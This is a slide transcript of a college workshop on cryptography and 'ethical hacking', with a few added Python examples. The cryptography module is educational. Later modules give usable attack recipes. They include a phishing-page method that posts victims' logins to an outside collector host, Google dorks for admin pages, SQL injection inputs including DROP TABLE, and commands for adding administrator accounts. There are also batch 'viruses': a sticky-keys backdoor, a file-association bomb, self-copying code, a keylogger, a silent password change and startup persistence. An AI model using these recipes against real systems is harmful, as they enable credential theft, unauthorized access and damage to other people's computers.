Workshop on 03 11-2012
Published in: Internet, Technology, Education
Transcript

  • 1. Workshop On Cryptography and Ethical Hacking 5/18/2014 1
  • 2. Modules: Cryptography Concepts – by K.K.Goyal (Asst Professor); Windows Password Hacking – by Parul Kaushik; Phishing & Security of Data – by Praval Sharma; SQL Injection & WebCam Hacking – by Gaurav Gautam; Batch Programming & Viruses – by Ehtisham Ali 5/18/2014 2
  • 3. MODULE 1 By: K K Goyal, Asst Professor, RBS MTC AGRA 5/18/2014 3
  • 4. Topics Under Module 1: Threats against electronic communications; Cryptography principles; Message Digests (One-way hash functions); Secret key (symmetric) cryptography; Public key (asymmetric) cryptography; Practical implementation of cryptography; The potential role of public authorities; Conclusions 5/18/2014 4
  • 5. Q. Is the Internet secure? The wrong question! Right questions: Is the telephone secure? Are postal services secure? Ans. A worldwide communication network with millions of users cannot be secure. 5/18/2014 5
  • 6. Q. Can specific Internet applications be secure? YES, this is the topic of today. Q. Are most of the Internet applications secure? Most don’t need to! Some should but aren’t! 5/18/2014 6
  • 7. World Wide Web [diagram: an HTTP client (web browser) linked to several HTTP servers by HTTP links transporting HTML-encoded hypertext, and to another server by another data link] 5/18/2014 7
  • 8. HTTP: Hypertext Transfer Protocol [diagram labels: Browser (HTTP client) and Web Server (HTTP server) exchanging a connectionless protocol; two transport entities exchanging a connection oriented protocol; network service] 5/18/2014 8
  • 9. HTTP is a Stateless Protocol. Logging in to a stateless server (Browser = HTTP client, Web Server = HTTP server): Client > I want to log into the server. Server < Give your name and password. Client > XYZ, ******. Server < OK, here is your key 478. Client > Show me my bank records, my key is 478. Server < Here are your bank records: $$$$$$$$$. If you need more use key 953. .... 5/18/2014 9
  • 11. Topics Under Module 1: Threats against electronic communications; Cryptography principles; Message Digests (One-way hash functions); Secret key (symmetric) cryptography; Public key (asymmetric) cryptography; Practical implementation of cryptography; The potential role of public authorities; Conclusions 5/18/2014 11
  • 12. Threats : data interception MAFIA NV/SA 5/18/2014 12
  • 13. Threats : masquerade MAFIA NV/SA 5/18/2014 13
  • 14. Threats : data manipulation MAFIA NV/SA "Transfer x € to account abc" "Transfer x € to account uvw" 5/18/2014 14
  • 15. Threats : message replay "Send me movie x and bill it to my account abc" "Send me movie x and bill it to my account abc" 5/18/2014 15
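The login exchange on slide 9 hands out a fresh key with every reply (478, then 953). As an added example (not part of the workshop slides), here is a server-side sketch of that scheme in which each key is unguessable and valid for one request only, so the replayed request of slide 15 is refused. The class, method names and the account data are hypothetical.

```python
import hmac
import secrets


class StatelessLoginDemo:
    """Toy server: every reply carries the key the client must use next."""

    def __init__(self, users):
        self._users = users      # name -> password (constructed demo data)
        self._valid = {}         # outstanding single-use key -> user name

    def _issue(self, user):
        key = secrets.token_urlsafe(16)   # CSPRNG output, unlike a guessable "478"
        self._valid[key] = user
        return key

    def login(self, name, password):
        expected = self._users.get(name)
        if expected is None:
            return None
        # Constant-time comparison of the supplied and stored password
        if not hmac.compare_digest(expected.encode(), password.encode()):
            return None
        return self._issue(name)

    def request(self, key, what):
        # pop() consumes the key: a second use of the same key finds nothing
        user = self._valid.pop(key, None)
        if user is None:
            return None, None
        return f"{what} for {user}", self._issue(user)


def demo():
    server = StatelessLoginDemo({"XYZ": "correct horse"})
    key1 = server.login("XYZ", "correct horse")
    body, key2 = server.request(key1, "bank records")
    replay = server.request(key1, "bank records")    # captured request sent again
    follow_up, _ = server.request(key2, "more records")
    return body, replay, follow_up, key1 != key2
```

Single-use keys only stop a request from being accepted twice; a key that is intercepted before its first use still has to be protected by encrypting the channel.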
  • 16. Threats : message repudiation "It is a pity you instructed me to sell, abc gained in value" "Sell all my abc shares" "I never instructed you to sell my abc shares, you have to compensate" 5/18/2014 16
  • 17. Topics Under Module 1: Threats against electronic communications; Cryptography principles; Message Digests (One-way hash functions); Secret key (symmetric) cryptography; Public key (asymmetric) cryptography; Practical implementation of cryptography; The potential role of public authorities; Conclusions 5/18/2014 17
  • 18. Hiding Information 5/18/2014 18
  • 19. One Way Hash Functions for checking message integrity. Sender: compute message digest (all message bits should influence digest; computing digest from message simple; computing message from digest impossible; e.g.: digest = checksum); send message + digest. Receiver: receive message and digest; compute digest from received message; compare computed and received digests. 5/18/2014 19
  • 20. One Way Hash Functions for checking message integrity. Sender [diagram: the message is hashed into a digest; message + digest are sent] 5/18/2014 20
  • 21. One Way Hash Functions for checking message integrity. Receiver [diagram: the received message is hashed into a digest, which is compared (=?) with the received digest; outcomes: OK or <>] 5/18/2014 21
  • 22. Cryptography [diagram: cleartext "Sell all my abc shares" enters a CRYPTO-ALGORITHM with the encryption key, giving ciphertext "nseefglw47 0%GHkdaJ"; a CRYPTO-ALGORITHM with the decryption key turns it back into "Sell all my abc shares"] 5/18/2014 22
  • 23. Crypto-algorithms. Well known and widely available algorithm: only keys are to be kept secret; potential intruders and volunteer experts can search for algorithmic weaknesses; weaknesses will quickly be publicized!; widely used on the Internet and for ecommerce. Secret algorithm: encryption devices need to be protected and replaced if compromised; very few people can verify algorithms; weaknesses can remain hidden, but possibly known by potential intruders; common in proprietary and/or military systems. 5/18/2014 23
  • 24. Crypto-keys. Encryption_Key = Decryption_Key: "Secret Key Cryptography" • Symmetric • Key distribution problem • Fast encryption and decryption. Encryption_Key ≠ Decryption_Key: "Public Key Cryptography" • Asymmetric • Key publicity problem • Slow encryption and decryption. In practice, both are used together. 5/18/2014 24
  • 25. Secret Key Cryptography [diagram: cleartext is encrypted by a CRYPTO-ALGORITHM with the secret key, the ciphertext crosses an unprotected channel and is decrypted by a CRYPTO-ALGORITHM with the same secret key; the secret key travels over a secure channel] One secret key per users pair ensures both confidentiality and authenticity. 5/18/2014 25
  • 26. Secret Key Cryptography: The Data Encryption Standard (DES) • Fast algorithm for bulk encryption • Hardware or software implementations • Security somewhat controversial • Multiple encryption very secure • Commonly used [diagram: 64 bit cleartext blocks and a 56 bit secret key give 64 bit ciphertext blocks] 5/18/2014 26
  • 27. Public Key Cryptography for ensuring confidentiality [diagram: cleartext is encrypted with the public key of a key pair, the ciphertext crosses an unprotected channel and is decrypted with the secret key; the public key is distributed over an unprotected (?) channel] A secret message intended for A should be encoded with A's public key! 5/18/2014 27
  • 28. Public Key Cryptography for identifying sender [diagram: cleartext is encrypted with the secret key of a key pair, the ciphertext crosses an unprotected channel and is decrypted with the public key; the public key is distributed over an unprotected (?) channel] A message that can be decoded with A's public key was certainly sent by A! 5/18/2014 28
  • 29. Public Key Cryptography: RSA algorithm 1. select two large prime numbers p and q 2. compute n = p*q and z = (p-1)*(q-1) 3. select decryption key d relatively prime to z 4. find encryption key e such that (e*d) MOD z = 1 5. Encrypt M by computing E = M^e MOD n 6. Decrypt by computing M = E^d MOD n. Computing d or e from the other one requires factorization of n into its prime factors p and q. Factorization of n (>200 digits) is an extremely long operation (months on a supercomputer). RSA is much slower than DES. 5/18/2014 29
  • 30. Topics Under Module 1: Threats against electronic communications; Cryptography principles; Message Digests (One-way hash functions); Secret key (symmetric) cryptography; Public key (asymmetric) cryptography; Practical implementation of cryptography; The potential role of public authorities; Conclusions 5/18/2014 30
  • 31. Some tools related to cryptography • TrueCrypt • Yodas Crypter • Frame Based Encryption Scheme • Crypt Tool 5/18/2014 31
  • 32. GSM station authentication [diagram: MS (holding Ki), VLR and HLR (holding i:Ki); messages labelled imsi; vlr,imsi; rand,sres,Kc; rand; sres; then data & signalling enciphered by Kc] sres = A3(Ki,rand); Kc = A8(Ki,rand) 5/18/2014 32
  • 33. Electronic Signatures: Signing a message [diagram: the message is hashed into a digest; a CRYPTO-ALGORITHM with the signer's secret key turns the digest into the signature; message + signature are sent] 5/18/2014 33
  • 34. Electronic Signatures: Checking the signature [diagram: the received message is hashed into a digest; a CRYPTO-ALGORITHM with the signer's public key recovers a digest from the signature; the two digests are compared (=?); outcomes: OK or <>] 5/18/2014 34
  • 35. Practical Cryptography • Confidentiality of messages : – long : Symmetric key cryptography – short : Asymmetric key cryptography • Authenticity of messages (electronic signature) : – Asymmetric key cryptography to authenticate message digest obtained by hashing • Non repudiation : – undisputable time stamp in digest – copy of digest in trustworthy repository • Distribution of symmetric keys – Asymmetric key cryptography 5/18/2014 35
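The six RSA steps of slide 29 and the hash-then-sign scheme of slides 33 to 35, carried through as an added example (not part of the workshop slides). The primes, the choice of d, the sample message and all function names are constructed for illustration; the textbook form shown here has no padding and toy key sizes.

```python
import hashlib
from math import gcd


def make_keys(p, q, d):
    """Steps 1-4: n = p*q, z = (p-1)*(q-1), d coprime to z, (e*d) MOD z = 1."""
    n, z = p * q, (p - 1) * (q - 1)
    if gcd(d, z) != 1:
        raise ValueError("d must be relatively prime to z")
    e = pow(d, -1, z)            # modular inverse (Python 3.8+)
    return (e, n), (d, n)        # (public key, secret key)


def encrypt(m, public):
    """Step 5: E = M^e MOD n, defined only for 0 <= M < n."""
    e, n = public
    if not 0 <= m < n:
        raise ValueError("message must be smaller than n")
    return pow(m, e, n)


def decrypt(c, secret):
    """Step 6: M = E^d MOD n."""
    d, n = secret
    return pow(c, d, n)


def digest(message, n):
    """SHA-256 digest reduced mod n to fit the toy modulus (real schemes pad)."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % n


def sign(message, secret):
    """Slide 33: apply the signer's secret key to the message digest."""
    d, n = secret
    return pow(digest(message, n), d, n)


def verify(message, signature, public):
    """Slide 34: recover the digest with the public key and compare (=?)."""
    e, n = public
    return pow(signature, e, n) == digest(message, n)


# Constructed toy parameters: small primes so the numbers can be followed by hand
SMALL_PUBLIC, SMALL_SECRET = make_keys(61, 53, 2753)      # gives e = 17, n = 3233

# Two Mersenne primes give a modulus wide enough for a meaningful digest check
PUBLIC, SECRET = make_keys(2**61 - 1, 2**89 - 1, 65537)
ORDER = b"Sell all my abc shares"
SIGNATURE = sign(ORDER, SECRET)
```

With these values `encrypt(65, SMALL_PUBLIC)` is 2790 and decrypts back to 65, and `verify` accepts `ORDER` but rejects the same signature presented with an altered message.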
  • 36. Topics Under Module 1: Threats against electronic communications; Cryptography principles; Message Digests (One-way hash functions); Secret key (symmetric) cryptography; Public key (asymmetric) cryptography; Practical implementation of cryptography; The potential role of public authorities; Conclusions 5/18/2014 36
  • 37. Public Key Cryptography Ensuring both confidentiality and authenticity A B eA eB dA dB 5/18/2014 37
  • 38. Public Key Cryptography Public Keys can be changed !!! MAFIA NV/SA A B eA em dA dm dm' dB eB em' 5/18/2014 38
  • 39. Certification Authority Certification Authority A B A:PA B:PB sCA sA PCA sB PCA 5/18/2014 39
  • 40. Digital Certificates • Issued by a well known Certification Authority (CA) • Contains at least : – Identification of the issuing CA – Unambiguous identity of the owner – The owner's public key – electronic signature of CA • Any user knowing the public key of the CA can recover the public key of the certificate owner. • Only the public key of the CA needs to be generally well known and regularly checked. 5/18/2014 40
  • 41. Conclusion • All techniques for secure ecommerce exist • Large scale usage requires third-party certification – For identity of users – For time-stamps • Certifying the identity of individuals and corporations is a natural task for public authorities • Postal services have a tradition of providing trustworthy time stamps • Observatories could also become providers of high accuracy time stamps • Legislative action is urgently needed 5/18/2014 41
  • 42. MODULE 2 By Parul Kaushik 5/18/2014 42
  • 43. Topics Under Module 2: Types Of Passwords 1) Login Password 2) BIOS Password 3) Biometric Password 4) Boot Password 5) Syskey Password 5/18/2014 43
  • 44. Login passwords commands 1) net user * 2) net user hack /add 3) net localgroup administrators <account name> /add 4) net user hack /del 5/18/2014 44
  • 45. Boot Password: GO TO BIOS SETTINGS…. THEN GO TO SECURITY TAB. BOOT PASSWORD - USER PASSWORD. BIOS PASSWORD - SUPERVISOR PASSWORD. BIOS AND BOOT PASSWORD CAN BE CRACKED BY REMOVING THE CMOS BATTERY FOR 5 MINUTES. 5/18/2014 45
  • 46. Topics Under Module 2: Tools for login passwords • OPH Crack • Kon Boot • Offline Password Cracker • Active Password Changer • ERD Commander 5/18/2014 46
  • 47. MODULE 3 By Praval Sharma 5/18/2014 47
  • 48. Topics Under Module 3: 1) PHISHING ATTACK 2) LOCKING FOLDERS 3) HIDING DRIVE PARTITIONS 5/18/2014 48
  • 49. OPEN ANY LOGIN PAGE GO TO FILE THEN, SAVE PAGE AS….  WEB PAGE , HTML ONLY. CLICK SAVE PAGE. OPEN PAGE WITH NOTEPAD. PRESS CTRL+F TO FIND FIND ACTION. THEN PLACE THIS CODE AFTER ACTION ACTION=“HTTP://CYBERCURE.NET /TESTERS /PRACPH57.PHP? ID=“YOUR EMAIL ID”& LINK=SITE NAME” Phishing Attacks 5/18/2014 49
  • 50. Locking Folders: By using the Change Access Control Lists (CACLS) command. - Open CMD (in Windows 7 open CMD as an Administrator) - Use this command: For locking the folder: CACLS <Folder Name> /E /P Everyone:N For accessing the folder: CACLS <Folder Name> /E /P Everyone:F 5/18/2014 50
  • 51. Hiding Drive Partitions: Open CMD as an Administrator. Type the following commands: C:\Users\User Account>DISKPART (press Enter) DISKPART> List Volume (press Enter) DISKPART> Select Volume <Volume Number> (press Enter) DISKPART> Remove letter <Drive letter> (press Enter) YOUR DISK HAS BEEN HIDDEN NOW 5/18/2014 51
  • 52. Hiding Drive Partitions: REPEAT ALL STEPS AS MENTIONED IN PREVIOUS SLIDE. CHANGE THE FOURTH STEP AS: DISKPART> Assign letter <Drive letter> (press Enter) YOUR DISK HAS BEEN MADE VISIBLE NOW 5/18/2014 52
  • 53. MODULE 4 By GAURAV GAUTAM 5/18/2014 53
  • 54. Topics Under Module 4: 1) SQL INJECTION 2) ONLINE WEBCAM 5/18/2014 54
  • 55. SQL Injection: SQL injection is a technique often used to attack a website. This is done by including portions of SQL statements in a web form entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database. 5/18/2014 55
  • 56. SQL Injection: Type any of the following points in Google to get Admin Login pages: INURL: admin.asp INURL: adminlogin.asp INURL: admin.aspx INURL: adminlogin.aspx INURL: admin.asp INURL: admin.php INURL: adminlogin.php 5/18/2014 56
  • 57. SQL Injection: SQL Injection Attacks by Example. Query: SELECT field list FROM table WHERE field = 'password'; where the field value is like: anything' OR 'x'='x / x' AND email IS NULL; / bob@example.com' AND password = 'hello123 / 23 OR 1=1 / ''; DROP TABLE users; -- 5/18/2014 57
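Why the first input on slide 57 changes the query, and the fix, shown as an added example (not part of the workshop slides): the same lookup built by string concatenation and with a bound parameter, run against an in-memory SQLite database. The table, its rows and the function names are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """In-memory database holding two constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE members (email TEXT, name TEXT)")
    db.executemany(
        "INSERT INTO members VALUES (?, ?)",
        [("bob@example.com", "Bob"), ("alice@example.com", "Alice")],
    )
    return db


def lookup_vulnerable(db, email):
    # The form value is pasted into the SQL text, so a quote inside it
    # ends the string literal and the rest is parsed as SQL.
    sql = "SELECT email FROM members WHERE email = '" + email + "';"
    return sorted(row[0] for row in db.execute(sql))


def lookup_parameterized(db, email):
    # The value is bound separately from the statement and is only ever
    # compared as data, whatever characters it contains.
    sql = "SELECT email FROM members WHERE email = ?"
    return sorted(row[0] for row in db.execute(sql, (email,)))


FORM_INPUT = "anything' OR 'x'='x"      # the first input listed on slide 57


def demo():
    db = make_db()
    return (
        lookup_vulnerable(db, FORM_INPUT),        # WHERE clause is always true
        lookup_parameterized(db, FORM_INPUT),     # no member has this address
        lookup_parameterized(db, "bob@example.com"),
    )
```

The concatenated version returns every row for that input, while the parameterized version returns none and still finds a legitimate address.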
  • 58. MODULE 5 By Ehtisham Ali 5/18/2014 58
  • 59. Topics Under Module 5: 1) Disable Internet 2) Self deleting code 3) Net user automation 4) File extension bomb 5) Full control of file 6) Sticky attack automation 7) Self copying code 8) Simple keylogger 9) Startup code 10) Website blocking 5/18/2014 59
  • 60. Disable Internet > @echo off > ::--------Block Internet-------:: > ipconfig /release > if ERRORLEVEL1 ipconfig /release_all > 5/18/2014 60
  • 61. Self deleting code > @echo off > CD .. > START CMD /C DEL /Q "%~dpnx0" > 5/18/2014 61
  • 62. Net user automation > @echo off > ::--Change Pass To 1234--:: > net user %username% 1234 > 5/18/2014 62
  • 63. File Extension Bomb > @echo off > color fc > assoc .jpg=internetshortcut > assoc .mp3=internetshortcut > assoc .lnk=internetshortcut > assoc .htm=internetshortcut > assoc .html=internetshortcut > assoc .txt=internetshortcut > assoc .doc=internetshortcut > assoc .xlsx=internetshortcut > assoc .docx=internetshortcut > assoc .chm=internetshortcut > assoc .hlp=internetshortcut > assoc .pdf=internetshortcut > assoc .png=internetshortcut > assoc .rar=internetshortcut > assoc .zip=internetshortcut > 5/18/2014 63
  • 64. Full control of a file > @echo off > ::----ownership----:: > takeown /f “file” /a > ::----Access Rights----:: > cacls “file” /e /p everyone:f > 5/18/2014 64
  • 65. Sticky attack automation > @echo off > copy c:windowssystem32cmd.exe c: /y > ren c:cmd.exe sethc.exe > takeown /f c:windowssystem32sethc.exe /a > cacls c:windowssystem32sethc.exe /e /p everyone:f > copy c:sethc.exe c:windowssystem32 /y > del c:sethc.exe > 5/18/2014 65
  • 66. Self copying code > @echo off > xcopy viral.cmd c: /C /Q /H /R /K /Y /Z > 5/18/2014 66
  • 67. Simple keylogger > @echo off > title Simple Keylogger > color 0a > :log > set /p "a=>" > cls > echo %a% >> keylog.txt > cls > goto log > 5/18/2014 67
  • 68. Startup code > @echo off > REG ADD HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun /v mypad /t REG_SZ /d %SystemRoot%system32notepad.exe /f > start %SystemRoot%system32notepad.exe > 5/18/2014 68
  • 69. WEBSITE BLOCKING > @echo off > ::--------Block Facebook-------:: > cd "C:WindowsSystem32Driversetc" > echo 127.0.0.1 www.facebook.com >> "Hosts" > echo 127.0.0.1 facebook.com >> "Hosts" > echo 127.0.0.1 static.ak.fbcdn.net >> "Hosts" > echo 127.0.0.1 www.static.ak.fbcdn.net >> "Hosts" > echo 127.0.0.1 login.facebook.com >> "Hosts" > echo 127.0.0.1 www.login.facebook.com >> "Hosts" > echo 127.0.0.1 fbcdn.net >> "Hosts" > echo 127.0.0.1 www.fbcdn.net >> "Hosts" > echo 127.0.0.1 fbcdn.com >> "Hosts" > echo 127.0.0.1 www.fbcdn.com >> "Hosts" > echo 127.0.0.1 static.ak.connect.facebook.com >> "Hosts" > echo 127.0.0.1 www.static.ak.connect.facebook.com >> "Hosts" > 5/18/2014 69
  • 70. Safe Browsing: Follow some useful tips to browse the internet safely. Use a virtual keyboard to enter data in web forms (osk.exe – Windows virtual keyboard). Check the authenticity of a website before interacting with it. Install security software to protect against spyware, malware, and Trojans. If you use net banking, never Google for your bank website; rather, always type the URL in the address field. Before visiting websites like bank sites, social networking sites and others, check for SSL protection. If it is there, then you have a better level of security. If you are a frequent downloader of executable files, then make sure to scan your downloaded files with this online service: https://www.virustotal.com/ 5/18/2014 70
